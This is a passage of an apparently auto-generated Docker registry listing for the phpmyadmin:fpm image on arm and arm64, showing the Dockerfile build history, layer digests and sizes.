Last Modified: Wed, 31 Mar 2021 13:32:25 GMT
Size: 771.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
### `phpmyadmin:fpm` - linux; arm variant v7
```console
$ docker pull phpmyadmin@sha256:220f0bcadfdbda5fba92813aba91dfc82698b81a38cab4ec37c4342fbc061c6e
```
- Docker Version: 19.03.12
- Manifest MIME: `application/vnd.docker.distribution.manifest.v2+json`
- Total Size: **135.7 MB (135683018 bytes)**
(compressed transfer size, not on-disk size)
- Image ID: `sha256:01a590f2a90ad713440a4296c22fb297abd29f86da25a1fdecf559e595f51d41`
- Entrypoint: `["\/docker-entrypoint.sh"]`
- Default Command: `["php-fpm"]`
```dockerfile
# Tue, 30 Mar 2021 23:08:38 GMT
ADD file:c1eeb99fc8ec483e175d4948a58d7f7b246b0d6b887f435a5fef07ef43699f76 in /
# Tue, 30 Mar 2021 23:08:41 GMT
CMD ["bash"]
# Wed, 31 Mar 2021 07:22:05 GMT
RUN set -eux; { echo 'Package: php*'; echo 'Pin: release *'; echo 'Pin-Priority: -1'; } > /etc/apt/preferences.d/no-debian-php
# Wed, 31 Mar 2021 07:22:06 GMT
ENV PHPIZE_DEPS=autoconf dpkg-dev file g++ gcc libc-dev make pkg-config re2c
# Wed, 31 Mar 2021 07:22:47 GMT
RUN set -eux; apt-get update; apt-get install -y --no-install-recommends $PHPIZE_DEPS ca-certificates curl xz-utils ; rm -rf /var/lib/apt/lists/*
# Wed, 31 Mar 2021 07:22:51 GMT
ENV PHP_INI_DIR=/usr/local/etc/php
# Wed, 31 Mar 2021 07:22:55 GMT
RUN set -eux; mkdir -p "$PHP_INI_DIR/conf.d"; [ ! -d /var/www/html ]; mkdir -p /var/www/html; chown www-data:www-data /var/www/html; chmod 777 /var/www/html
# Wed, 31 Mar 2021 07:32:37 GMT
ENV PHP_EXTRA_CONFIGURE_ARGS=--enable-fpm --with-fpm-user=www-data --with-fpm-group=www-data --disable-cgi
# Wed, 31 Mar 2021 07:32:38 GMT
ENV PHP_CFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
# Wed, 31 Mar 2021 07:32:40 GMT
ENV PHP_CPPFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
# Wed, 31 Mar 2021 07:32:41 GMT
ENV PHP_LDFLAGS=-Wl,-O1 -pie
# Wed, 31 Mar 2021 07:48:40 GMT
ENV GPG_KEYS=42670A7FE4D0441C8E4632349E4FDC074A4EF02D 5A52880781F755608BF815FC910DEB46F53EA312
# Wed, 31 Mar 2021 07:48:41 GMT
ENV PHP_VERSION=7.4.16
# Wed, 31 Mar 2021 07:48:42 GMT
ENV PHP_URL=https://www.php.net/distributions/php-7.4.16.tar.xz PHP_ASC_URL=https://www.php.net/distributions/php-7.4.16.tar.xz.asc
# Wed, 31 Mar 2021 07:48:44 GMT
ENV PHP_SHA256=1c16cefaf88ded4c92eed6a8a41eb682bb2ef42429deb55f1c4ba159053fb98b
# Wed, 31 Mar 2021 07:49:04 GMT
RUN set -eux; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends gnupg dirmngr; rm -rf /var/lib/apt/lists/*; mkdir -p /usr/src; cd /usr/src; curl -fsSL -o php.tar.xz "$PHP_URL"; if [ -n "$PHP_SHA256" ]; then echo "$PHP_SHA256 *php.tar.xz" | sha256sum -c -; fi; if [ -n "$PHP_ASC_URL" ]; then curl -fsSL -o php.tar.xz.asc "$PHP_ASC_URL"; export GNUPGHOME="$(mktemp -d)"; for key in $GPG_KEYS; do gpg --batch --keyserver ha.pool.sks-keyservers.net --recv-keys "$key"; done; gpg --batch --verify php.tar.xz.asc php.tar.xz; gpgconf --kill all; rm -rf "$GNUPGHOME"; fi; apt-mark auto '.*' > /dev/null; apt-mark manual $savedAptMark > /dev/null; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false
# Wed, 31 Mar 2021 07:49:05 GMT
COPY file:ce57c04b70896f77cc11eb2766417d8a1240fcffe5bba92179ec78c458844110 in /usr/local/bin/
# Wed, 31 Mar 2021 07:52:06 GMT
RUN set -eux; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends libargon2-dev libcurl4-openssl-dev libedit-dev libonig-dev libsodium-dev libsqlite3-dev libssl-dev libxml2-dev zlib1g-dev ${PHP_EXTRA_BUILD_DEPS:-} ; rm -rf /var/lib/apt/lists/*; export CFLAGS="$PHP_CFLAGS" CPPFLAGS="$PHP_CPPFLAGS" LDFLAGS="$PHP_LDFLAGS" ; docker-php-source extract; cd /usr/src/php; gnuArch="$(dpkg-architecture --query DEB_BUILD_GNU_TYPE)"; debMultiarch="$(dpkg-architecture --query DEB_BUILD_MULTIARCH)"; if [ ! -d /usr/include/curl ]; then ln -sT "/usr/include/$debMultiarch/curl" /usr/local/include/curl; fi; ./configure --build="$gnuArch" --with-config-file-path="$PHP_INI_DIR" --with-config-file-scan-dir="$PHP_INI_DIR/conf.d" --enable-option-checking=fatal --with-mhash --with-pic --enable-ftp --enable-mbstring --enable-mysqlnd --with-password-argon2 --with-sodium=shared --with-pdo-sqlite=/usr --with-sqlite3=/usr --with-curl --with-libedit --with-openssl --with-zlib --with-pear $(test "$gnuArch" = 's390x-linux-gnu' && echo '--without-pcre-jit') --with-libdir="lib/$debMultiarch" ${PHP_EXTRA_CONFIGURE_ARGS:-} ; make -j "$(nproc)"; find -type f -name '*.a' -delete; make install; find /usr/local/bin /usr/local/sbin -type f -executable -exec strip --strip-all '{}' + || true; make clean; cp -v php.ini-* "$PHP_INI_DIR/"; cd /; docker-php-source delete; apt-mark auto '.*' > /dev/null; [ -z "$savedAptMark" ] || apt-mark manual $savedAptMark; find /usr/local -type f -executable -exec ldd '{}' ';' | awk '/=>/ { print $(NF-1) }' | sort -u | xargs -r dpkg-query --search | cut -d: -f1 | sort -u | xargs -r apt-mark manual ; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false; pecl update-channels; rm -rf /tmp/pear ~/.pearrc; php --version
# Wed, 31 Mar 2021 07:52:09 GMT
COPY multi:6dfba8f7e64bd54e4d9aa0855ff6ce7a53059e0a733752b4537fd3fdfd32d837 in /usr/local/bin/
# Wed, 31 Mar 2021 07:52:12 GMT
RUN docker-php-ext-enable sodium
# Wed, 31 Mar 2021 07:52:13 GMT
ENTRYPOINT ["docker-php-entrypoint"]
# Wed, 31 Mar 2021 07:52:14 GMT
WORKDIR /var/www/html
# Wed, 31 Mar 2021 07:52:17 GMT
RUN set -eux; cd /usr/local/etc; if [ -d php-fpm.d ]; then sed 's!=NONE/!=!g' php-fpm.conf.default | tee php-fpm.conf > /dev/null; cp php-fpm.d/www.conf.default php-fpm.d/www.conf; else mkdir php-fpm.d; cp php-fpm.conf.default php-fpm.d/www.conf; { echo '[global]'; echo 'include=etc/php-fpm.d/*.conf'; } | tee php-fpm.conf; fi; { echo '[global]'; echo 'error_log = /proc/self/fd/2'; echo; echo '; https://github.com/docker-library/php/pull/725#issuecomment-443540114'; echo 'log_limit = 8192'; echo; echo '[www]'; echo '; if we send this to /proc/self/fd/1, it never appears'; echo 'access.log = /proc/self/fd/2'; echo; echo 'clear_env = no'; echo; echo '; Ensure worker stdout and stderr are sent to the main error log.'; echo 'catch_workers_output = yes'; echo 'decorate_workers_output = no'; } | tee php-fpm.d/docker.conf; { echo '[global]'; echo 'daemonize = no'; echo; echo '[www]'; echo 'listen = 9000'; } | tee php-fpm.d/zz-docker.conf
# Wed, 31 Mar 2021 07:52:17 GMT
STOPSIGNAL SIGQUIT
# Wed, 31 Mar 2021 07:52:20 GMT
EXPOSE 9000
# Wed, 31 Mar 2021 07:52:21 GMT
CMD ["php-fpm"]
# Thu, 01 Apr 2021 04:17:05 GMT
RUN set -ex; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends libbz2-dev libfreetype6-dev libjpeg-dev libpng-dev libwebp-dev libxpm-dev libzip-dev ; docker-php-ext-configure gd --with-freetype --with-jpeg --with-webp --with-xpm; docker-php-ext-install -j "$(nproc)" bz2 gd mysqli opcache zip ; apt-mark auto '.*' > /dev/null; apt-mark manual $savedAptMark; ldd "$(php -r 'echo ini_get("extension_dir");')"/*.so | awk '/=>/ { print $3 }' | sort -u | xargs -r dpkg-query -S | cut -d: -f1 | sort -u | xargs -rt apt-mark manual; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false; rm -rf /var/lib/apt/lists/*
# Thu, 01 Apr 2021 04:17:07 GMT
ENV MAX_EXECUTION_TIME=600
# Thu, 01 Apr 2021 04:17:08 GMT
ENV MEMORY_LIMIT=512M
# Thu, 01 Apr 2021 04:17:09 GMT
ENV UPLOAD_LIMIT=2048K
# Thu, 01 Apr 2021 04:17:13 GMT
RUN set -ex; { echo 'opcache.memory_consumption=128'; echo 'opcache.interned_strings_buffer=8'; echo 'opcache.max_accelerated_files=4000'; echo 'opcache.revalidate_freq=2'; echo 'opcache.fast_shutdown=1'; } > $PHP_INI_DIR/conf.d/opcache-recommended.ini; { echo 'session.cookie_httponly=1'; echo 'session.use_strict_mode=1'; } > $PHP_INI_DIR/conf.d/session-strict.ini; { echo 'allow_url_fopen=Off'; echo 'max_execution_time=${MAX_EXECUTION_TIME}'; echo 'max_input_vars=10000'; echo 'memory_limit=${MEMORY_LIMIT}'; echo 'post_max_size=${UPLOAD_LIMIT}'; echo 'upload_max_filesize=${UPLOAD_LIMIT}'; } > $PHP_INI_DIR/conf.d/phpmyadmin-misc.ini
# Thu, 01 Apr 2021 04:17:14 GMT
ENV VERSION=5.1.0
# Thu, 01 Apr 2021 04:17:15 GMT
ENV SHA256=aa8ccf357f672012384df34e1c2bc70147476761c8458a0dad6233497e142c68
# Thu, 01 Apr 2021 04:17:17 GMT
ENV URL=https://files.phpmyadmin.net/phpMyAdmin/5.1.0/phpMyAdmin-5.1.0-all-languages.tar.xz
# Thu, 01 Apr 2021 04:17:17 GMT
LABEL org.opencontainers.image.title=Official phpMyAdmin Docker image org.opencontainers.image.description=Run phpMyAdmin with Alpine, Apache and PHP FPM. org.opencontainers.image.authors=The phpMyAdmin Team <[email protected]> org.opencontainers.image.vendor=phpMyAdmin org.opencontainers.image.documentation=https://github.com/phpmyadmin/docker#readme org.opencontainers.image.licenses=GPL-2.0-only org.opencontainers.image.version=5.1.0 org.opencontainers.image.url=https://github.com/phpmyadmin/docker#readme org.opencontainers.image.source=https://github.com/phpmyadmin/docker.git
# Thu, 01 Apr 2021 04:17:50 GMT
RUN set -ex; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends gnupg dirmngr ; export GNUPGHOME="$(mktemp -d)"; export GPGKEY="3D06A59ECE730EB71B511C17CE752F178259BD92"; curl -fsSL -o phpMyAdmin.tar.xz $URL; curl -fsSL -o phpMyAdmin.tar.xz.asc $URL.asc; echo "$SHA256 *phpMyAdmin.tar.xz" | sha256sum -c -; gpg --batch --keyserver ha.pool.sks-keyservers.net --recv-keys "$GPGKEY" || gpg --batch --keyserver ipv4.pool.sks-keyservers.net --recv-keys "$GPGKEY" || gpg --batch --keyserver keys.gnupg.net --recv-keys "$GPGKEY" || gpg --batch --keyserver pgp.mit.edu --recv-keys "$GPGKEY" || gpg --batch --keyserver keyserver.pgp.com --recv-keys "$GPGKEY"; gpg --batch --verify phpMyAdmin.tar.xz.asc phpMyAdmin.tar.xz; tar -xf phpMyAdmin.tar.xz -C /var/www/html --strip-components=1; mkdir -p /var/www/html/tmp; chown www-data:www-data /var/www/html/tmp; gpgconf --kill all; rm -r "$GNUPGHOME" phpMyAdmin.tar.xz phpMyAdmin.tar.xz.asc; rm -rf /var/www/html/setup/ /var/www/html/examples/ /var/www/html/test/ /var/www/html/po/ /var/www/html/composer.json /var/www/html/RELEASE-DATE-$VERSION; sed -i "s@define('CONFIG_DIR'.*@define('CONFIG_DIR', '/etc/phpmyadmin/');@" /var/www/html/libraries/vendor_config.php; apt-mark auto '.*' > /dev/null; apt-mark manual $savedAptMark; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false; rm -rf /var/lib/apt/lists/*
# Thu, 01 Apr 2021 04:17:54 GMT
COPY file:74e988fef607090521e63cea57b4c61ab22b3a2a131bc55f0cf4a0d9c36ce65d in /etc/phpmyadmin/config.inc.php
# Thu, 01 Apr 2021 04:17:55 GMT
COPY file:7a1864d35a5b72dc75fa085c7d09497f417e1ef1eacb8597037c366f1978b5fa in /docker-entrypoint.sh
# Thu, 01 Apr 2021 04:17:57 GMT
ENTRYPOINT ["/docker-entrypoint.sh"]
# Thu, 01 Apr 2021 04:17:58 GMT
CMD ["php-fpm"]
```
- Layers:
- `sha256:ee0a2cc24f2963b99b1d30dc2613f196b7c9e38337cf99332d6c4efe07f01ef2`
Last Modified: Tue, 30 Mar 2021 23:16:25 GMT
Size: 22.7 MB (22739814 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:6902379d71a94188d5c60681ae18bd9f9fa097906a99e027038263140fa89950`
Last Modified: Wed, 31 Mar 2021 08:31:33 GMT
Size: 226.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:d113a588066812e435718c64d9b2879309ea88c6fe5f5b398b8231cc96bd2611`
Last Modified: Wed, 31 Mar 2021 08:31:55 GMT
Size: 59.5 MB (59512371 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:06d469e8c06518630db4bbc7bb2aeca23cd234ab4a06f2907ca2b721a2336f86`
Last Modified: Wed, 31 Mar 2021 08:31:32 GMT
Size: 269.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:0b7e19bf54addb343fa2ba79bfa2555662f4fdf809770d8f7573b97fd3601f54`
Last Modified: Wed, 31 Mar 2021 08:35:06 GMT
Size: 10.7 MB (10654281 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:fda17693662fcacee7caeaa999cb1cd78350a1d5a11c800ed265d1acb41f69b6`
Last Modified: Wed, 31 Mar 2021 08:35:03 GMT
Size: 491.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:777eea881005d5ded6dcb3e9fcbdd24b7e05e1bff209c3db2216d5ea74c21aac`
Last Modified: Wed, 31 Mar 2021 08:35:12 GMT
Size: 26.2 MB (26200688 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:57e336485d3c190e697f2cf90ec08887782cfd576cb3a5f2ae67fca58e7b2198`
Last Modified: Wed, 31 Mar 2021 08:35:03 GMT
Size: 2.3 KB (2270 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:9b89842c784ec5ce9eb39f17a0f15f5dedd7e40f400f74a25ab145c6eda2afd9`
Last Modified: Wed, 31 Mar 2021 08:35:04 GMT
Size: 247.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:efec1292d352b2e322ae0b0bd64ae6901e909809d4e327253dffb0bc3979b760`
Last Modified: Wed, 31 Mar 2021 08:35:06 GMT
Size: 8.4 KB (8448 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:59d90ebfe4aeae9bc82ee6010e1530fd33312d51a53c84c261f24a07540aea0e`
Last Modified: Thu, 01 Apr 2021 04:19:02 GMT
Size: 2.5 MB (2496920 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:2fb275c5f72ad5b36a59f0f9ea87c43ba2c1b0561ef5e22efdf29b1a083f2384`
Last Modified: Thu, 01 Apr 2021 04:19:02 GMT
Size: 546.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:2f1eb993f34a773b4660c9a891c5b59537d295b02df789cdd4b422b5f22245fd`
Last Modified: Thu, 01 Apr 2021 04:19:09 GMT
Size: 14.1 MB (14064148 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:49148a65116b7a89e286bf6f1a4c4a093324a1493f2fa727519de44dd01f8ac0`
Last Modified: Thu, 01 Apr 2021 04:19:01 GMT
Size: 1.5 KB (1527 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:c1a420768bbbaa6ff94992e39b838ef865b1b6448f27e9a1bffb03445c947073`
Last Modified: Thu, 01 Apr 2021 04:19:02 GMT
Size: 772.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
### `phpmyadmin:fpm` - linux; arm64 variant v8
```console
$ docker pull phpmyadmin@sha256:2ae7220d85686481ba3f282371c03ff5ddcc187f426899ee3c1e0048717c5bba
```
- Docker Version: 19.03.12
- Manifest MIME: `application/vnd.docker.distribution.manifest.v2+json`
- Total Size: **152.2 MB (152150723 bytes)**
(compressed transfer size, not on-disk size)
- Image ID: `sha256:be2eafa5472cfc0a822c85bcb81eec6c94204ac809af4bad1386dcfb42700fc8`
- Entrypoint: `["\/docker-entrypoint.sh"]`
- Default Command: `["php-fpm"]`
```dockerfile
# Tue, 30 Mar 2021 21:47:15 GMT
ADD file:a9b57ded2400fc7f60ea40e5ccdd3e9bf0f72acfcc47223ceb66b4fa16955059 in /
# Tue, 30 Mar 2021 21:47:16 GMT
CMD ["bash"]
# Wed, 31 Mar 2021 06:00:41 GMT
RUN set -eux; { echo 'Package: php*'; echo 'Pin: release *'; echo 'Pin-Priority: -1'; } > /etc/apt/preferences.d/no-debian-php
# Wed, 31 Mar 2021 06:00:43 GMT
ENV PHPIZE_DEPS=autoconf dpkg-dev file g++ gcc libc-dev make pkg-config re2c
# Wed, 31 Mar 2021 06:01:18 GMT
RUN set -eux; apt-get update; apt-get install -y --no-install-recommends $PHPIZE_DEPS ca-certificates curl xz-utils ; rm -rf /var/lib/apt/lists/*
# Wed, 31 Mar 2021 06:01:20 GMT
ENV PHP_INI_DIR=/usr/local/etc/php
# Wed, 31 Mar 2021 06:01:23 GMT
RUN set -eux; mkdir -p "$PHP_INI_DIR/conf.d"; [ ! -d /var/www/html ]; mkdir -p /var/www/html; chown www-data:www-data /var/www/html; chmod 777 /var/www/html
# Wed, 31 Mar 2021 06:10:37 GMT
ENV PHP_EXTRA_CONFIGURE_ARGS=--enable-fpm --with-fpm-user=www-data --with-fpm-group=www-data --disable-cgi
# Wed, 31 Mar 2021 06:10:38 GMT
ENV PHP_CFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
# Wed, 31 Mar 2021 06:10:39 GMT
ENV PHP_CPPFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
# Wed, 31 Mar 2021 06:10:40 GMT
ENV PHP_LDFLAGS=-Wl,-O1 -pie
# Wed, 31 Mar 2021 06:25:24 GMT
ENV GPG_KEYS=42670A7FE4D0441C8E4632349E4FDC074A4EF02D 5A52880781F755608BF815FC910DEB46F53EA312
# Wed, 31 Mar 2021 06:25:25 GMT
ENV PHP_VERSION=7.4.16
# Wed, 31 Mar 2021 06:25:25 GMT
ENV PHP_URL=https://www.php.net/distributions/php-7.4.16.tar.xz PHP_ASC_URL=https://www.php.net/distributions/php-7.4.16.tar.xz.asc
# Wed, 31 Mar 2021 06:25:26 GMT
ENV PHP_SHA256=1c16cefaf88ded4c92eed6a8a41eb682bb2ef42429deb55f1c4ba159053fb98b
# Wed, 31 Mar 2021 06:25:46 GMT
RUN set -eux; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends gnupg dirmngr; rm -rf /var/lib/apt/lists/*; mkdir -p /usr/src; cd /usr/src; curl -fsSL -o php.tar.xz "$PHP_URL"; if [ -n "$PHP_SHA256" ]; then echo "$PHP_SHA256 *php.tar.xz" | sha256sum -c -; fi; if [ -n "$PHP_ASC_URL" ]; then curl -fsSL -o php.tar.xz.asc "$PHP_ASC_URL"; export GNUPGHOME="$(mktemp -d)"; for key in $GPG_KEYS; do gpg --batch --keyserver ha.pool.sks-keyservers.net --recv-keys "$key"; done; gpg --batch --verify php.tar.xz.asc php.tar.xz; gpgconf --kill all; rm -rf "$GNUPGHOME"; fi; apt-mark auto '.*' > /dev/null; apt-mark manual $savedAptMark > /dev/null; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false
# Wed, 31 Mar 2021 06:25:47 GMT
COPY file:ce57c04b70896f77cc11eb2766417d8a1240fcffe5bba92179ec78c458844110 in /usr/local/bin/
# Wed, 31 Mar 2021 06:29:00 GMT
RUN set -eux; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends libargon2-dev libcurl4-openssl-dev libedit-dev libonig-dev libsodium-dev libsqlite3-dev libssl-dev libxml2-dev zlib1g-dev ${PHP_EXTRA_BUILD_DEPS:-} ; rm -rf /var/lib/apt/lists/*; export CFLAGS="$PHP_CFLAGS" CPPFLAGS="$PHP_CPPFLAGS" LDFLAGS="$PHP_LDFLAGS" ; docker-php-source extract; cd /usr/src/php; gnuArch="$(dpkg-architecture --query DEB_BUILD_GNU_TYPE)"; debMultiarch="$(dpkg-architecture --query DEB_BUILD_MULTIARCH)"; if [ ! -d /usr/include/curl ]; then ln -sT "/usr/include/$debMultiarch/curl" /usr/local/include/curl; fi; ./configure --build="$gnuArch" --with-config-file-path="$PHP_INI_DIR" --with-config-file-scan-dir="$PHP_INI_DIR/conf.d" --enable-option-checking=fatal --with-mhash --with-pic --enable-ftp --enable-mbstring --enable-mysqlnd --with-password-argon2 --with-sodium=shared --with-pdo-sqlite=/usr --with-sqlite3=/usr --with-curl --with-libedit --with-openssl --with-zlib --with-pear $(test "$gnuArch" = 's390x-linux-gnu' && echo '--without-pcre-jit') --with-libdir="lib/$debMultiarch" ${PHP_EXTRA_CONFIGURE_ARGS:-} ; make -j "$(nproc)"; find -type f -name '*.a' -delete; make install; find /usr/local/bin /usr/local/sbin -type f -executable -exec strip --strip-all '{}' + || true; make clean; cp -v php.ini-* "$PHP_INI_DIR/"; cd /; docker-php-source delete; apt-mark auto '.*' > /dev/null; [ -z "$savedAptMark" ] || apt-mark manual $savedAptMark; find /usr/local -type f -executable -exec ldd '{}' ';' | awk '/=>/ { print $(NF-1) }' | sort -u | xargs -r dpkg-query --search | cut -d: -f1 | sort -u | xargs -r apt-mark manual ; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false; pecl update-channels; rm -rf /tmp/pear ~/.pearrc; php --version
# Wed, 31 Mar 2021 06:29:02 GMT
COPY multi:6dfba8f7e64bd54e4d9aa0855ff6ce7a53059e0a733752b4537fd3fdfd32d837 in /usr/local/bin/
# Wed, 31 Mar 2021 06:29:05 GMT
RUN docker-php-ext-enable sodium
# Wed, 31 Mar 2021 06:29:06 GMT
ENTRYPOINT ["docker-php-entrypoint"]
# Wed, 31 Mar 2021 06:29:07 GMT
WORKDIR /var/www/html
# Wed, 31 Mar 2021 06:29:10 GMT
RUN set -eux; cd /usr/local/etc; if [ -d php-fpm.d ]; then sed 's!=NONE/!=!g' php-fpm.conf.default | tee php-fpm.conf > /dev/null; cp php-fpm.d/www.conf.default php-fpm.d/www.conf; else mkdir php-fpm.d; cp php-fpm.conf.default php-fpm.d/www.conf; { echo '[global]'; echo 'include=etc/php-fpm.d/*.conf'; } | tee php-fpm.conf; fi; { echo '[global]'; echo 'error_log = /proc/self/fd/2'; echo; echo '; https://github.com/docker-library/php/pull/725#issuecomment-443540114'; echo 'log_limit = 8192'; echo; echo '[www]'; echo '; if we send this to /proc/self/fd/1, it never appears'; echo 'access.log = /proc/self/fd/2'; echo; echo 'clear_env = no'; echo; echo '; Ensure worker stdout and stderr are sent to the main error log.'; echo 'catch_workers_output = yes'; echo 'decorate_workers_output = no'; } | tee php-fpm.d/docker.conf; { echo '[global]'; echo 'daemonize = no'; echo; echo '[www]'; echo 'listen = 9000'; } | tee php-fpm.d/zz-docker.conf
# Wed, 31 Mar 2021 06:29:11 GMT
STOPSIGNAL SIGQUIT
# Wed, 31 Mar 2021 06:29:12 GMT
EXPOSE 9000
# Wed, 31 Mar 2021 06:29:13 GMT
CMD ["php-fpm"]
# Thu, 01 Apr 2021 07:22:32 GMT
RUN set -ex; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends libbz2-dev libfreetype6-dev libjpeg-dev libpng-dev libwebp-dev libxpm-dev libzip-dev ; docker-php-ext-configure gd --with-freetype --with-jpeg --with-webp --with-xpm; docker-php-ext-install -j "$(nproc)" bz2 gd mysqli opcache zip ; apt-mark auto '.*' > /dev/null; apt-mark manual $savedAptMark; ldd "$(php -r 'echo ini_get("extension_dir");')"/*.so | awk '/=>/ { print $3 }' | sort -u | xargs -r dpkg-query -S | cut -d: -f1 | sort -u | xargs -rt apt-mark manual; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false; rm -rf /var/lib/apt/lists/*
# Thu, 01 Apr 2021 07:22:34 GMT
ENV MAX_EXECUTION_TIME=600
# Thu, 01 Apr 2021 07:22:35 GMT
ENV MEMORY_LIMIT=512M
# Thu, 01 Apr 2021 07:22:36 GMT
ENV UPLOAD_LIMIT=2048K
# Thu, 01 Apr 2021 07:22:39 GMT
RUN set -ex; { echo 'opcache.memory_consumption=128'; echo 'opcache.interned_strings_buffer=8'; echo 'opcache.max_accelerated_files=4000'; echo 'opcache.revalidate_freq=2'; echo 'opcache.fast_shutdown=1'; } > $PHP_INI_DIR/conf.d/opcache-recommended.ini; { echo 'session.cookie_httponly=1'; echo 'session.use_strict_mode=1'; } > $PHP_INI_DIR/conf.d/session-strict.ini; { echo 'allow_url_fopen=Off'; echo 'max_execution_time=${MAX_EXECUTION_TIME}'; echo 'max_input_vars=10000'; echo 'memory_limit=${MEMORY_LIMIT}'; echo 'post_max_size=${UPLOAD_LIMIT}'; echo 'upload_max_filesize=${UPLOAD_LIMIT}'; } > $PHP_INI_DIR/conf.d/phpmyadmin-misc.ini
# Thu, 01 Apr 2021 07:22:40 GMT
ENV VERSION=5.1.0
# Thu, 01 Apr 2021 07:22:41 GMT
ENV SHA256=aa8ccf357f672012384df34e1c2bc70147476761c8458a0dad6233497e142c68
# Thu, 01 Apr 2021 07:22:43 GMT
ENV URL=https://files.phpmyadmin.net/phpMyAdmin/5.1.0/phpMyAdmin-5.1.0-all-languages.tar.xz
# Thu, 01 Apr 2021 07:22:44 GMT
LABEL org.opencontainers.image.title=Official phpMyAdmin Docker image org.opencontainers.image.description=Run phpMyAdmin with Alpine, Apache and PHP FPM. org.opencontainers.image.authors=The phpMyAdmin Team <[email protected]> org.opencontainers.image.vendor=phpMyAdmin org.opencontainers.image.documentation=https://github.com/phpmyadmin/docker#readme org.opencontainers.image.licenses=GPL-2.0-only org.opencontainers.image.version=5.1.0 org.opencontainers.image.url=https://github.com/phpmyadmin/docker#readme org.opencontainers.image.source=https://github.com/phpmyadmin/docker.git
# Thu, 01 Apr 2021 07:23:09 GMT
RUN set -ex; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends gnupg dirmngr ; export GNUPGHOME="$(mktemp -d)"; export GPGKEY="3D06A59ECE730EB71B511C17CE752F178259BD92"; curl -fsSL -o phpMyAdmin.tar.xz $URL; curl -fsSL -o phpMyAdmin.tar.xz.asc $URL.asc; echo "$SHA256 *phpMyAdmin.tar.xz" | sha256sum -c -; gpg --batch --keyserver ha.pool.sks-keyservers.net --recv-keys "$GPGKEY" || gpg --batch --keyserver ipv4.pool.sks-keyservers.net --recv-keys "$GPGKEY" || gpg --batch --keyserver keys.gnupg.net --recv-keys "$GPGKEY" || gpg --batch --keyserver pgp.mit.edu --recv-keys "$GPGKEY" || gpg --batch --keyserver keyserver.pgp.com --recv-keys "$GPGKEY"; gpg --batch --verify phpMyAdmin.tar.xz.asc phpMyAdmin.tar.xz; tar -xf phpMyAdmin.tar.xz -C /var/www/html --strip-components=1; mkdir -p /var/www/html/tmp; chown www-data:www-data /var/www/html/tmp; gpgconf --kill all; rm -r "$GNUPGHOME" phpMyAdmin.tar.xz phpMyAdmin.tar.xz.asc; rm -rf /var/www/html/setup/ /var/www/html/examples/ /var/www/html/test/ /var/www/html/po/ /var/www/html/composer.json /var/www/html/RELEASE-DATE-$VERSION; sed -i "s@define('CONFIG_DIR'.*@define('CONFIG_DIR', '/etc/phpmyadmin/');@" /var/www/html/libraries/vendor_config.php; apt-mark auto '.*' > /dev/null; apt-mark manual $savedAptMark; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false; rm -rf /var/lib/apt/lists/*
# Thu, 01 Apr 2021 07:23:12 GMT
COPY file:74e988fef607090521e63cea57b4c61ab22b3a2a131bc55f0cf4a0d9c36ce65d in /etc/phpmyadmin/config.inc.php
# Thu, 01 Apr 2021 07:23:13 GMT
COPY file:7a1864d35a5b72dc75fa085c7d09497f417e1ef1eacb8597037c366f1978b5fa in /docker-entrypoint.sh
# Thu, 01 Apr 2021 07:23:15 GMT
ENTRYPOINT ["/docker-entrypoint.sh"]
# Thu, 01 Apr 2021 07:23:16 GMT
CMD ["php-fpm"]
```
- Layers:
- `sha256:6fcf2156bc23db75595b822b865fbc962ed6f4521dec8cae509e66742a6a5ad3`
Last Modified: Tue, 30 Mar 2021 21:54:27 GMT
Size: 25.9 MB (25904513 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:ae1d497f4e5ea580a3a4b8a826f8c71379d6e7a76bd10d45f32adbac91f61cb2`
Last Modified: Wed, 31 Mar 2021 07:09:33 GMT
Size: 226.0 B
